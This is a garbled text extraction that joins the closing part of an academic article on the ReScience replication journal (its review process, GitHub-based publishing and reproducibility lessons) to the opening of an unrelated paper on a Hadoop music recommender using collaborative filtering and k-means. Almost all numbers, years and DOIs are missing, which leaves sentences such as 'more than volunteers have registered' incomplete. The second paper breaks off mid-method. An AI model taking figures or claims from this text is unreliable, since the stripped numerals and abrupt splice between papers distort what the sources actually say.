https://rescience.github.io http://dx.doi.org/ . /peerj-cs. box . authors having published in rescience explain their motivation. 
(stachelek, ) i was motivated to replicate the results of the original paper because i feel that working through code supplements to blog posts has really helped me learn the process of scientific analysis. i could have published my replication as a blog post but i wanted the exposure and permanency that goes along with journal articles. this was my first experience with formal replication. i think the review was useful because it forced me to consider how the replication would be used by people other than my- self. i have not yet experienced any new interactions following publication. however, i did notify the author of the original implementation about the replication’s publi- cation. i think this may lead to future correspondence. the original author suggested that he would consider submitting his own replications to rescience in the future. (topalidou & rougier, ) our initial motivation and the main reason for replicating the model is that we needed it in order to collaborate with our neurobiologist colleagues. when we arrived in our new lab, the model had just been published ( ) but the original author had left the lab a few months before our arrival. there was no public repository nor version control, and the paper describing the model was incomplete and partly inaccurate. we managed to get our hands on the original sources ( , lines of delphi) only to realize we could not compile them. it took us three months to replicate it using lines of python. but at this time, there was no place to publish this kind of replication to share the new code with colleagues. since then, we have refined the model and made new predictions that have been confirmed. our initial replication effort really gave the model a second life. (viejo, girard & khamassi, ) replicating previous work is a relatively routine task every time we want to build a new model: either because we want to build on this previous work, or because we want to compare our new model to it. we also give replication tasks to m.sc. students every year, as projects. in all these cases, we are confronted with incomplete or inaccurate model descriptions, as well as with the impossibility to obtain the original results. contacting the original authors sometimes solves the problem, but not so often (because of the dog ate my hard drive syndrome). we thus accumulate knowledge, internal to the lab, about which model works and which doesn’t, and how a given model has to be parameterized to really work. without any place to publish it, this knowledge is wasted. publishing it in rescience, opening the discussion publicly, will be a progress for all of us. rescience is an openly-peer-reviewed journal that targets computational research and encourages the explicit replication of already published research. in order to provide the largest possible benefit to the scientific community, replications are required to be reproducible and open-source. in two years of existence, articles have been published and are currently under review (# , # , # , # ). the editorial board covers a wide range of computational sciences (see http://rescience.github.io/board/) and more than volunteers have registered to be reviewers. the scientific domains of published work rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ http://rescience.github.io/board/ http://dx.doi.org/ . /peerj-cs. are computational neuroscience, neuroimaging, computational ecology and computer graphics, with a majority in computational neuroscience. the most popular programming languages are python and r. the review process takes about days on average and involves about comments. there is a strong bias towards successful replication ( %); experience has taught us that researchers are reluctant to publish failed replications, even when they can prove that the original work is wrong. for young researchers, there is a social/professional risk in publishing articles that show results from a senior researcher to be wrong. until we implement a certified anonymized submission process, this strong bias will most likely remain. one of the specificities of the rescience journal is a publishing chain that is radically different from any other traditional scientific journal, since rescience lives on github, a platform originally designed for collaborative software development. a rescience submission is treated very similarly to a contribution to an open source software project. one of the consequences is that the whole process, from submission via reviewing to publication, is open for anyone to see and even comment on. each submission is considered by a member of the editorial board, who may decide to reject the submission if it does not respect the formal publication criteria of rescience. a submission must contain • a precise reference to the work being replicated, • an explanation of why the authors think they have replicated the paper (same figures, same graphics, same behavior, etc.) or why they have failed, • a description of any difficulties encountered during the replication, • open-source code that produces the replication results, • an explanation of this code for human readers. a complete submission therefore consists of both computer code and an accompanying article, which are sent to rescience in the form of a pull request (the process used on github to submit a proposed modification to a software project). partial replications that cover only some of the results in the original work are acceptable, but must be justified. if the submission respects these criteria, the editor assigns it to two reviewers for further evaluation and tests. the reviewers evaluate the code and the accompanying material in continuous interaction with the authors through the discussion section until both reviewers consider the work acceptable for publication. the goal of the review is thus to help the authors meet the rescience quality standards through discussion. since rescience targets replication of already published work, the criteria of importance or novelty applied by most traditional journals are irrelevant. for a successful submission (i.e., partial or full replication) to be accepted, both reviewers must consider it reproducible and a valid replication of the original work. as we explained earlier, this means that the reviewers • are able to run the proposed implementation on their computers, • obtain the same results as indicated in the accompanying paper, rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
• consider these results sufficiently close to the ones reported in the original paper being replicated. for a failure to replicate submission to be accepted, we require extra steps to be taken. in addition to scrutiny of the submission by reviewers and editors, we will try to contact the authors of the original research, and issue a challenge to the community to spot and report errors in the new implementation. if no errors are found, the submission will be accepted and the original research will be declared non-replicable. since independent implementation is a major feature of replication work, rescience does not allow authors to submit replications of their own research, nor the research of close collaborators. moreover, replication work should be based exclusively on the originally published paper, although exceptions are admitted if properly documented in the replication article. mistakes in the implementation of computational models and methods are often due to biases that authors invariably have, consciously or not. such biases will inevitably carry over to a replication. perhaps even more importantly, cross-fertilization is generally useful in research, and trying to replicate the work of one’s peers might pave the way for a future collaboration, or may give rise to new ideas as a result of the replication effort. lessons learned although rescience is still a young project, the submissions handled so far already provide valuable experience concerning the reproducibility and replicability of computational work in scientific research. short-term and long-term reproducibility while some of the reasons for non-reproducibility are specific to each scientific domain, our experience has shown that there are also some common issues that can be identified. missing code and/or data, undocumented dependencies, and inaccurate or imprecise description appear to be characteristic of much non-reproducible work. moreover, these problems are not always easy to detect even for attentive reviewers, as we discovered when some articles published in rescience turned out to be difficult to reproduce for someone else for exactly the reasons listed above. rescience reviewers are scientists working in the same domain as the submitting authors, because familiarity with the field is a condition for judging if a replication is successful. but this also means that our reviewers share a significant common background with the authors, and that background often includes the software packages and programming languages adopted by their community. in particular, if both authors and reviewers have essential libraries of their community installed on their computers, they may not notice that these libraries are actually dependencies of the submitted code. while solutions to this problem evidently exist (rescience could, for example, request that authors make their software work on a standard computational environment supplied in the form of a virtual machine), they represent an additional effort to authors and therefore discourage them from submitting replication work to rescience. moreover, the evaluation of de-facto reproducibility (‘‘works on my machine’’) rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. by reviewers is useful as well, because it tests the robustness of the code under small variations in the computational environments that are inevitable in real life. 
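one lightweight habit that helps to surface such hidden dependencies, short of shipping a full virtual machine, is to have authors list every third-party package their code imports together with the installed version. the sketch below is only an illustration of this idea and is not part of the rescience tooling; it assumes a single-file python submission (python 3.10 or later, for sys.stdlib_module_names) and is run with the submission file as its only argument.

```python
import ast
import sys
from importlib.metadata import version, PackageNotFoundError

def imported_modules(path):
    """Return the top-level module names imported by one Python source file."""
    with open(path, encoding="utf-8") as src:
        tree = ast.parse(src.read())
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

for name in sorted(imported_modules(sys.argv[1])):
    if name in sys.stdlib_module_names:   # standard library, nothing to pin
        continue
    try:
        # note: the import name and the distribution name can differ
        # (e.g. a module imported as 'yaml' is installed as 'PyYAML')
        print(f"{name}=={version(name)}")
    except PackageNotFoundError:
        print(f"{name}  (no package metadata found)")
```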
our goal is to develop a set of recommendations for authors that represent a workable compromise between reproducibility, robustness, and implementation effort. these recommendations will evolve over time, and we hope that with improving technology we will ultimately reach full reproducibility over a few decades. another issue with reproducibility is that with today’s computing technology, long- term reproducibility can only be achieved by imposing drastic constraints on languages and libraries that are not compatible with the requirements of research computing. this problem is nicely illustrated by mesnard & barba ( ) whose authors report trying to reproduce their own work performed two years earlier. even though barba’s group is committed to reproducible research practices, they did not escape the many problems one can face when trying to re-run a piece of code. as a consequence, code that is written for rescience today will likely cease to be functional at some point in the future. the long-term value of a rescience publication lies not just in the actual code but also in the accompanying article. the combination of the original article and the replication article provide a complete and consistent description of the original work, as evidenced by the fact that replication was possible. even , , or years later, a competent scientist should be able to replicate the work again thanks to these two articles. of course, the new code can also help, but the true long-term value of a replication is the accompanying article. open reviewing the well-known weaknesses of the traditional anonymous peer-reviewing system used by most scientific journals have motivated many experiments with alternative reviewing processes. the variant adopted by rescience is similar to the ones used by f research or peerj, but is even more radically open: anyone can look at rescience submissions and at the complete reviewing process, starting from the assignment of an editor and the invitation of reviewers. moreover, anyone with a github account can intervene by commenting. such interventions could even be anonymous because a github account is not required to advertise a real name or any other identifying element. rescience does currently require all authors, editors, and reviewers to provide real names (which however are not verified in any way), but there are valid reasons to allow anonymity for authors and reviewers, in particular to allow junior scientists to criticize the work of senior colleagues without fear of retribution, and we envisage exploring such options in the future. our experience with this open reviewing system is very positive so far. the exchanges between reviewers and authors are constructive and courteous, without exception. they are more similar in style to a coffee-table discussion than to the judgement/defence style that dominates traditional anonymous reviewing. once reviewers have been invited and have accepted the task, the editors’ main role is to ensure that the review moves forward, by gently reminding everyone to reply within reasonable delays. in addition, the editors occasionally answer questions by authors and reviewers about the rescience publishing process. the possibility to involve participants beyond the traditional group of authors, editors, and reviewers is particularly interesting in the case of rescience, because it can be helpful rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
to solicit input from the authors of the original study that is being replicated. for example, in one recent case (# ), a reviewer suggested asking the author of the original work for permission to re-use an image. the author intervened in the review and granted permission. publishing on the github platform github is a commercial platform for collaborative software development based on the popular version control system git. it offers unlimited free use to public projects, defined as projects whose contents are accessible to everyone. all rescience activities are organized around a few such open source projects hosted by github. this is an unusual choice for a scientific journal, the only other journal hosted on github being the journal of open source software (smith et al., ). in this section, we discuss the advantages and problems resulting from this choice, considering both technical and social issues. there are clear differences between platforms for software development, such as github, and platforms for scientific publishing, such as highwire. the latter tend to be expensive commercial products developed for the needs of large commercial publishers, although the market is beginning to diversify with products such as episciences. more importantly, to the best of our knowledge, no existing scientific publishing platform supports the submission and review of code, which is an essential part of every rescience article. for this reason, the only option for rescience was to adopt a software development platform and develop a set of procedures that make it usable for scientific publishing. our experience shows that the github platform provides excellent support for the reviewing process, which is not surprising given that the review of a scientific article containing code is not fundamentally different from the review of code with accompanying documentation. one potential issue for other journals envisaging adoption of this platform is the necessity that submitting authors have a basic knowledge of the version control system git and of the techniques of collaborative software development. given the code-centric nature of rescience, this has not been a major problem for us, and the minor issues have been resolved by our editors providing technical assistance to authors. it is of course possible that potential authors are completely discouraged from submitting to rescience by their lack of the required technical competence, but so far nobody has provided feedback suggesting that this is a problem. the main inconvenience of the github platform is its almost complete lack of support for the publishing steps, once a submission has successfully passed the reviewing process. at this point, the submission consists of an article text in markdown format plus a set of code and data files in a git repository. the desired archival form is an article in pdf format plus a permanent archive of the submitted code and data, with a digital object identifier (doi) providing a permanent reference. the zenodo platform allows straightforward archiving of snapshots of a repository hosted on github, and issues a doi for the archive. this leaves the task of producing a pdf version of the article, which is currently handled by the managing editor of the submission, in order to ease the technical burden on our authors. a minor inconvenience of the github platform is its implementation of code reviews. it is designed for reviewing contributions to a collaborative project. 
the contributor submits new code and modifications to existing code in the form of a ‘‘pull request’’, which other rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rescience/rescience-submission/pull/ http://github.com/ https://git-scm.com/ http://home.highwire.org/ https://www.episciences.org/ https://zenodo.org/ http://dx.doi.org/ . /peerj-cs. project members can then comment on. in the course of the exchanges, the contributor can update the code and request further comments. once everybody is satisfied, the contribution is ‘‘merged’’ into the main project. in the case of rescience, the collaborative project is the whole journal, and each article submission is a contribution proposed as a pull request. this is, however, not a very intuitive representation of how a journal works. it would be more natural to have a separate repository for each article, an arrangement that would also facilitate the final publishing steps. however, github does not allow code review on a new repository, only on contributions to an already existing one. relying on a free-use offer on a commercial platform poses some additional problems for scientific publishing. github can change its conditions at any time, and could in principle delete or modify rescience contents at any time without prior notice. moreover, in the case of technical problems rendering rescience contents temporarily or permanently inaccessible, the rescience community has no legal claims for compensation because there is no contract that would imply any obligations for github. it would clearly be imprudent to count on github for long-term preservation of rescience content, which is why we deposit accepted articles on zenodo, a platform designed for archiving scientific information and funded by research organizations as an element of public research infrastructure. the use of free services provided by github and zenodo was clearly important to get rescience started. the incentives for the publication of replication work being low, and its importance being recognized only slowly in the scientific community, funding rescience through either author page charges or grants would have created further obstacles to its success. a less obvious advantage of not having to organize funding is that rescience can exist without being backed by any legal entity that would manage its budget. this makes it possible to maintain a community spirit focused on shared scientific objectives, with nobody in a position to influence rescience by explicit or implicit threats of reducing future funding. outlook based on our experience with the rescience initiative, we can engage in informed speculation about possible future evolutions in scientific publishing, in particular concerning replication work. we will not discuss minor technical advances such as a better toolchain for producing pdf articles, but concentrate on long-term improvements in the technology of electronic publishing and, most of all, in the attitude of the scientific community towards the publication, preservation, and verification of computer-aided research. a fundamental technical issue is the difficulty of archiving or accurately describing the software environments in which computational scientists perform their work. a publication should be accompanied by both a human-readable description of this environment and an executable binary form. 
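as a small concrete illustration of such a human-readable description, the few lines of python below write a plain-text snapshot of the interpreter, the platform and the versions of all packages visible to the interpreter at the time a computation is run. this is only a sketch of the idea, and the output file name is arbitrary; real solutions such as the guix and conda environment descriptions discussed below record much more, including compilers and system libraries.

```python
import sys
import platform
from importlib.metadata import distributions

# write a plain-text snapshot of the software environment next to the results
with open("environment.txt", "w") as log:
    log.write(f"python {sys.version}\n")
    log.write(f"platform {platform.platform()}\n")
    packages = sorted(
        (dist.metadata["Name"] or "unknown", dist.version) for dist in distributions()
    )
    for name, ver in packages:
        log.write(f"{name}=={ver}\n")
```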
the human-readable description allows an inspection of the versions of all software packages that were used, for example to check for the impact of bugs that become known only after a study was published. the executable version enables other scientists to re-run the analyses and inspect intermediate results. ideally, the rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. human-readable description would permit rebuilding the executable version, in the same way that software source code permits rebuilding executable binaries. this approach is pursued for example by the package manager guix (courtés & wurmus, ). a more limited but still useful implementation of the same idea exists in the form of the conda package manager (anaconda inc., ), which uses a so-called environment file to describe and reconstruct environments. the main limitation compared to guix is that the packages that make up a conda environment are themselves not reproducible. for example, a conda environment file does not state which compiler versions were used to build a package. containerization, as implemented e.g., by docker (docker inc., ) is currently much discussed, but provides only the executable version without a human-readable description. moreover, the long-term stability of the container file format remains to be evaluated. history has shown that long-term stability in computing technology is achieved only by technology for which it is a design priority, as in the case of the java virtual machine (lindholm & yellin, ). docker, on the contrary, is promoted as a deployment technology with no visible ambition towards archiving of computational environments. today’s electronic publishing platforms for scientific research still show their origins in paper-based publishing. except for the replacement of printed paper by a printable pdf file, not much has changed. although it is increasingly realized that software and data should be integral parts of most scientific publications today, they are at best relegated to the status of ‘‘supplementary material’’, and systematically excluded from the peer review process. in fact, to the best of our knowledge, rescience is the only scientific journal that aims to verify the correctness of scientific software. as our experience has shown, it is far easier to graft publication onto a software development platform than to integrate software reviewing into a publishing platform. furthermore, tools that will allow for the automated validation of computational models and the automated verification of correctness are being actively developed in the community (see, for example, sciunit or osb-model-validation). an integration of such frameworks, which would greatly enhance the verification and validation process, seems feasible for the existing software development platforms. a logical next step is to fully embrace the technology designed for software development, which far better takes into account the specificity of electronic information processing than today’s scientific publishing systems. in addition to the proper handling of code, such an approach offers further advantages. perhaps the most important one is a shift of focus from the paper as a mostly isolated and finished piece of work to scientific progress as a collection of incremental and highly interdependent steps. 
the software heritage project, whose aim is to create a permanent public archive of all publicly available software source code, adopts exactly this point of view for the preservation of software. as our experience with rescience has shown, integrating the narrative of a scientific article into a framework designed for software development is not difficult at all. publishing and archiving scientific research in software heritage would offer several advantages. the intrinsic identifiers that provide access to the contents of the archive permit unambiguous and permanent references to ongoing projects as well as to snapshots at a specific time, and to whole projects as well as to the individual files that are part of them. such references hold the promise for better reuse of scientific information, for better reproducibility of computations, and for fairer attribution of credit to scientists who contribute to research infrastructure. figure [flow diagrams comparing the rescience and coscience publication chains] (a) the rescience publication chain starts from an original research article by authors a, published in a journal, in conference proceedings, or as a preprint. this article constitutes the base material for authors b, who attempt to replicate the work based on its description. success or failure to replicate is not a criterion for acceptance or rejection, even though failure to replicate requires more precaution to ensure this is not a misunderstanding or a bug in the new code. after review, the replication is published, and feedback is given to the original authors (and editors) to inform them that the work has been replicated (or not). (b) the coscience proposal would require the replication to happen before the actual publication. in case of failure, nothing will be published. in case of success, the publication will be endorsed by authors a and authors b with identified roles and will be certified as reproducible because it has been replicated by an independent group. one immediate and legitimate question is to wonder to what extent a replication could be performed prior to the publication of the original article. this would strongly reinforce a claim because a successful and independent replication would be available right from the start. as illustrated in fig. , this would require group a to contact group b and send them a draft of their original work (the one that would normally be submitted to a journal) so that group b could perform a replication and confirm or refute the results. in case of confirmation, a certified article could later be published with both groups as authors (each group being identified according to their respective roles). however, if the replication fails and the original work cannot be fixed, this would prevent publication.
this model would improve the quality of computational research and also considerably slow down the rapid pace of publication we are observing today. unfortunately, such a scenario seems highly improbable today. the pressure to publish is so strong and the incentive for doing replication so low that it would most probably prevent such collaborative work. however, we hope that the current replication crisis will lead to a change in attitude, with an emphasis on the quality rather than the quantity of scientific ouput, with coscience becoming the gold-standard approach to quality assurance. additional information and declarations funding the authors received no funding for this work. competing interests federico vaggi is an employee of amazon, inc., roman yurchak is an employee of symerio, and c. titus brown and nicolas p. rougier are academic editors for peerj. author contributions • nicolas p. rougier wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, co-founder, editor, author. • konrad hinsen wrote the paper, reviewed drafts of the paper, co-founder, editor. • frédéric alexandre, alexandra k. diem, rafael n. henriques, owen petchey, frank stollmeier and guillaume viejo reviewed drafts of the paper, author. • thomas arildsen, pierre de buyl and olivia guest wrote the paper, reviewed drafts of the paper, editor. rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • lorena a. barba, c. titus brown, timothée poisot, karthik ram and tiziano zito reviewed drafts of the paper, editor. • fabien c.y. benureau, ozan caglayan, andrew p. davison, marc-andré delsuc and etienne roesch wrote the paper, reviewed drafts of the paper, reviewer. • georgios detorakis, mehdi khamassi, aaron shifman and julien vitay reviewed drafts of the paper, reviewer, author. • damien drix, pierre enel, matt g. hall, xavier hinaut, kamil s. jaron, almar klein, tiina manninen, pietro marchesi, daniel mcglinn, hans ekkehard plesser, yoav ram, cyrille rossant, marcel stimberg, federico vaggi, anya e. vostinar and roman yurchak reviewed drafts of the paper, reviewer. • benoît girard wrote the paper, reviewed drafts of the paper, editor, reviewer, author. • christoph metzner wrote the paper, reviewed drafts of the paper, reviewer, author. • vahid rostami and joseph stachelek wrote the paper, reviewed drafts of the paper, author. data availability the following information was supplied regarding data availability: rescience journal: https://zenodo.org/communities/rescience/. references anaconda inc. . conda. available at https://conda.io/ . baker m. . , scientists lift the lid on reproducibility. nature ( ): – doi . / a. colberg c, proebsting ta. . repeatability in computer systems research. communi- cations of the acm ( ): – doi . / . coudert f-x. . reproducible research in computational chemistry of materials. chemistry of materials ( ): – doi . /acs.chemmater. b . courtès l, wurmus r. . reproducible and user-controlled software environments in hpc with guix. in: hunold s, costan a, giménez d, iosup a, ricci l, requena meg, scarano v, varbanescu al, scott sl, lankes s, weidendorfer j, alexander m, eds. euro-par : parallel processing workshops. lecture notes in computer science, vol. . cham: springer. crook sm, davison ap, plesser he. . years of computational neuroscience. in: bower mj, ed. chap. learning from the past: approaches for reproducibility in computational neuroscience. new york: springer new york, – . davison ap. . 
automated capture of experiment context for easier reproducibility in computational research. computing in science and engineering : – doi . /mcse. . . docker inc. . docker. available at https://www.docker.com/ . donoho dl, maleki a, rahman iu, shahram m, stodden v. . reproducible research in computational harmonic analysis. computing in science engineering ( ): – doi . /mcse. . . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://zenodo.org/communities/rescience/ https://conda.io/ http://dx.doi.org/ . / a http://dx.doi.org/ . / http://dx.doi.org/ . /acs.chemmater. b http://dx.doi.org/ . /mcse. . https://www.docker.com/ http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /peerj-cs. guo pj, engler d. . cde: using system call interposition to automatically create portable software packages. in: proceedings of the usenix annual technical conference, usenix’ . portland: usenix association. available at http://dl.acm. org/citation.cfm?id= . . halchenko yo, hanke m. . four aspects to make science open ‘‘by design’’ and not as an after-thought. gigascience ( ) doi . /s - - - . hinsen k. . writing software specifications. computing in science & engineering ( ): – doi . /mcse. . . ioannidis jpa. . why most published research findings are false. plos medicine ( ):e doi . /journal.pmed. . iqbal sa, wallach jd, khoury mj, schully sd, ioannidis jpa. . reproducible research practices and transparency across the biomedical literature. plos biology ( ):e doi . /journal.pbio. . janz n. . bringing the gold standard into the class room: replication in university teaching. international studies perspectives epub ahead of print mar doi . /insp. . kitzes j, turek d, deniz f (eds.) . the practice of reproducible research: case studies and lessons from the data-intensive sciences. oakland: university of california press. lindholm t, yellin f. . java virtual machine specification. second edition. boston: addison-wesley longman publishing co., inc. manninen t, havela r, linne m-l. . reproducibility and comparability of com- putational models for astrocyte calcium excitability. frontiers in neuroinformatics : doi . /fninf. . . mesnard o, barba la. . reproducible and replicable cfd: it’s harder than you think. ieee/aip computing in science and engineering ( ): – doi . /mcse. . . munafò mr, nosek ba, bishop dvm, button ks, chambers cd, du sert np, simon- sohn u, wagenmakers e-j, ware jj, ioannidis jpa. . a manifesto for repro- ducible science. nature human behaviour ( ): doi . /s - - . murta l, braganholo v, chirigati f, koop d, freire j. . noworkflow: capturing and analyzing provenance of scripts. in: provenance and annotation of data and processes. lecture notes in computer science, vol. . berlin: springer international publishing, – . open science collaboration. . estimating the reproducibility of psychological science. science ( ):aac –aac doi . /science.aac . perkel j. . democratic databases: science on github. nature ( ): – doi . / a. sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for repro- ducible computational research. plos compututational biology ( ):e doi . /journal.pcbi. . smith am, niemeyer ke, katz ds, barba la, githinji g, gymrek m, huff kd, madan cr, cabunoc mayes a, moerman km, prins p, ram k, rokem a, teal tk, valls rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . 
/journal.pmed. http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /insp. http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /science.aac http://dx.doi.org/ . / a http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /peerj-cs. guimera r, vanderplas jt. . journal of open source software (joss): design and first-year review. arxiv preprint. arxiv: . . stachelek j. . [re] least-cost modelling on irregular landscape graphs. rescience ( ) doi . /zenodo. . topalidou m, leblois a, boraud t, rougier np. . a long journey into repro- ducible computational neuroscience. frontiers in computational neuroscience : doi . /fncom. . . topalidou m, rougier np. . [re] interaction between cognitive and motor cortico- basal ganglia loops during decision making: a computational study. rescience ( ) doi . /zenodo. . viejo g, girard b, khamassi m. . [re] speed/accuracy trade-off between the habitual and the goal-directed process. rescience ( ) doi . /zenodo. . wilson g. . software carpentry: lessons learned. f research : doi . /f research. - .v . wilson g, aruliah da, brown ct, hong npc, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /fncom. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) design and implementation of music recommendation system based on hadoop zhao yufeng school of computer science and engineering xi'an university of technology shaanxi, xi’an, china e-mail: zyfzy @ .com li xinwei school of computer science and engineering xi'an university of technology shaanxi, xi’an, china e-mail: @qq.com abstract—in order to solve the problem of information overload of music system under large data background, this paper studies the design scheme of distributed music recommendation system based on hadoop. the proposed algorithm is based on the mapreduce distributed computing framework, which has high scalability and performance, and can be applied to the calculation and analysis of off-line data efficiently. the music recommendation system designed in this paper also includes client, server interface, database and etl operation, which can calculate a set of complete recommendation system from user operation end to server and data calculation. in order to improve the accuracy of the recommendation algorithm, this paper introduces k-means clustering algorithm to improve the recommendation algorithm based on user-based collaborative filtering.the experimental results show that the accuracy of the proposed algorithm has been significantly improved after the introduction of k-means. keywords-music recommendation; k-means clustering; collaborative filtering; recommendation algorithm; hadoop i. introduction with the development of the mobile internet, the amount of data generated by mobile app has increased rapidly in recent years. on july , , trustdata, a well-known mobile big data monitoring platform in china released the "analysis report of china mobile internet development in the first half of " [ ]. 
among them, mobile music is a high-frequency application whose user base showed steady growth in the first half of , with a peak dau (daily active users) of nearly million. taking netease cloud music as an example, since its client app was launched in april , the number of users has reached million and the number of song lists million. such a huge amount of data makes traditional single-server storage and processing increasingly clumsy. moreover, it becomes harder and harder for users to find their favorite songs in such a mass of data: the songs a user really likes are only a few, and finding them one by one is tedious. the usual practice is that when users want to listen to songs they search for them with a search engine, but this only turns up songs they already know; many songs that users do not know, but would probably like very much, will never be heard. a system that pushes suitable songs to users lets them spend less time searching and increases their stickiness to the service. based on this, this paper uses hadoop, a big-data computing and storage framework, to store and process the data, so as to solve the song-finding problem and improve user activity and stickiness. the hadoop-based recommendation system used in this paper has the following important implications in today's internet context: ) it effectively addresses the problem of "information overload" by providing users with interesting content derived from the relationship between users and songs; ) hadoop cluster parallel computing and distributed storage have good scalability and can effectively handle massive data storage and computing problems; ) for the enterprise, a system with a recommendation function enhances the user experience and increases user activity and stickiness. ii. algorithm basis a. traditional user-based collaborative filtering recommendation algorithm the traditional user-based collaborative filtering algorithm finds the users whose interests are most similar to those of the target user and then recommends, from these similar users, songs that the target user has not yet heard. concretely, a similarity measure is used to find the most similar users for each user; the listening records of these similar users are aggregated; the songs the target user has not heard are extracted from them; and these songs are ranked, using the similarities of the users who listened to them, to obtain a preference score for each song, in which order they are recommended to the target user [ ]. the specific algorithm steps are as follows: ) construct the user-song data representation matrix. each row vector represents a user and each column vector represents a song. a matrix entry indicates whether the user has heard the song: 0 means it has not been heard and 1 means it has been heard, so this is a 0-1 matrix. ) generate the nearest neighbor set. based on the user-song matrix, a similarity measure is used to compute the similarity between users so as to find the set of users closest to the target user. formula ( ) [ ] calculates the similarity of two users u and v, where N(u) denotes the set of songs user u has heard: $w_{uv} = \frac{\sum_{i \in N(u) \cap N(v)} \frac{1}{\log(1+|N(i)|)}}{\sqrt{|N(u)|\,|N(v)|}}$ ( ) ) produce recommendations. the recommendation value of a song that a similar user has heard but the target user has not is determined by the similarity of that user to the target user.
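as an illustration of steps 1)-3), the short python sketch below computes the pairwise similarities of formula ( ) on a toy in-memory data set and then scores the songs a target user has not yet heard by summing the similarities of the neighbors who listened to them. it is only a sketch of the idea: the user and song identifiers are invented, and the paper's actual implementation runs these steps as mapreduce jobs over the hdfs listening logs (section iv).

```python
import math
from collections import defaultdict
from itertools import combinations

# toy listening records: user id -> set of song ids the user has heard
listened = {
    "u1": {"s1", "s2", "s3"},
    "u2": {"s1", "s3", "s4"},
    "u3": {"s2", "s4"},
}

# invert to song -> listeners, so only user pairs that share a song are compared
listeners = defaultdict(set)
for user, songs in listened.items():
    for song in songs:
        listeners[song].add(user)

# formula (1): popular songs contribute little weight to the similarity
co_weight = defaultdict(float)
for song, users in listeners.items():
    weight = 1.0 / math.log(1.0 + len(users))
    for u, v in combinations(sorted(users), 2):
        co_weight[(u, v)] += weight
        co_weight[(v, u)] += weight

similarity = {
    pair: w / math.sqrt(len(listened[pair[0]]) * len(listened[pair[1]]))
    for pair, w in co_weight.items()
}

# step 3: score the songs the target user has not heard by summing the
# similarities of the k most similar users who did listen to them
target, k = "u1", 2
neighbors = sorted((v for v in listened if v != target),
                   key=lambda v: similarity.get((target, v), 0.0), reverse=True)[:k]
scores = defaultdict(float)
for v in neighbors:
    for song in listened[v] - listened[target]:
        scores[song] += similarity.get((target, v), 0.0)

print(sorted(scores.items(), key=lambda kv: kv[1], reverse=True))
```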
within the set of similar users, several users may have heard the same song, and the recommendation value of that song is the sum of their similarities to the target user. in this way, the songs the target user has not yet heard can be sorted by recommendation value, and the songs with the highest values are pushed to the target user first. formula ( ) [ ] calculates user u's preference for song i, where S(u,K) is the set of the K users most similar to u, N(i) is the set of users who have heard song i, and r_{vi} is user v's interest in song i: $p(u,i) = \sum_{v \in S(u,K) \cap N(i)} w_{uv} \, r_{vi}$ ( ) b. introducing the k-means algorithm to optimize the traditional recommendation algorithm clustering is an unsupervised learning method that groups data with similar attributes without manual labeling: data in the same group are similar to each other, while data in different groups differ. the improved collaborative filtering recommendation algorithm in this paper works on user groups with high internal similarity, so that the algorithm achieves a better recommendation effect. the similarity calculation directly determines the quality of the clustering and thus affects the final recommendation result. the principle of the algorithm is as follows: suppose there is a group of users of total size m, denoted u = (u_1, u_2, u_3, ..., u_m), and each user u_x has n attributes, recorded as c_x = (c_{x1}, c_{x2}, c_{x3}, ..., c_{xn}); clustering compares these attributes over the set u and divides the users into groups of similar users [ ]. the core idea of the k-means algorithm is to divide the given users into k groups: each group has a cluster center, the distance of every data point to each center is computed, and the point is assigned to the group whose center is closest. c. k-means clustering algorithm improvement ) removal of free points [ ]. among all the data points, free points are those that lie far away from all other points; their presence shifts the center of the class they are assigned to and degrades the classification. the process of removing free points in this paper is as follows: let the total number of users be m; the total number of paths between users (user pairs) is given by formula ( ): $l = \frac{m(m-1)}{2}$ ( ) the sum of the distances over all user pairs is then $d = \sum_{i=1}^{m} \sum_{j \neq i} \mathrm{gap}(c_i, c_j)$ ( ) $\mathrm{gap}(c_i, c_j) = (c_{i1}-c_{j1})^2 + (c_{i2}-c_{j2})^2 + \cdots + (c_{in}-c_{jn})^2$ ( )
